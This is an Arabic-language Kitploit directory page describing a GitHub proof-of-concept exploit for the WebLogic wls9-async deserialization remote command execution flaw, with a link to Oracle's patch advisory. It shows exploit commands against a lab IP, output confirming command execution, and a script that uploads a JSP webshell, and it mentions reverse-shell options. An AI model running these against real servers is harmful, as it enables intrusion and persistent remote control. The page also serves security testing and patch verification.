Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CNVD-C-2019-48814 — ثغرة تنفيذ أوامر عن بُعد عبر إلغاء التسلسل في WebLogic wls9-async | Kitploit
أدوات/GitHubGitHub/jas502n/cnvd-c-2019-48814
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubjas502n/cnvd-c-2019-48814

CNVD-C-2019-48814

ثغرة تنفيذ أوامر عن بُعد عبر إلغاء التسلسل في WebLogic wls9-async

عرض المستودع
23991منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CNVD-C-2019-48814

WebLogic wls9-async: ثغرة تنفيذ أوامر عن بُعد عبر إلغاء التسلسل

POC مع إظهار النتائج لـ WebLogic

تحديث التصحيح:

root@kitploit:~

https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html

إعادة إنتاج الثغرة:

root@kitploit:~
http://10.10.20.166:7001/_async/AsyncResponseService
root@kitploit:~
curl -i http://10.10.20.166:7001/_async/favicon.ico

فيديو CNVD-C-2019-48814

CNVD-C-2019-48814

root@kitploit:~
python CNVD-C-2019-48814.py -u  http://10.10.20.166:7001  -p 1.txt

>>>>Common See:

write website favicon.ico
Don't Need RMI Server

http://10.10.20.166:7001/_async/favicon.ico

>>>>Request Success!
status_code:202

C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
HTTP/1.1 200 OK
Date: Thu, 25 Apr 2019 14:37:49 GMT
Accept-Ranges: bytes
Content-Length: 5
Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1

root

استخدام RMI

CVE-2017-10271 بدون تصحيح

ويب شيل لنظامي ويندوز ولينكس

root@kitploit:~
upadte: 自定义webshell名字،适用于windows or linux upload webshell

python async_webshell-all.py  http://10.10.20.166:7001/ webshell.jsp
>>>Webshell:
http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

شل عكسي

عرض الأوامر

ويب شيل

تنزيل الأداة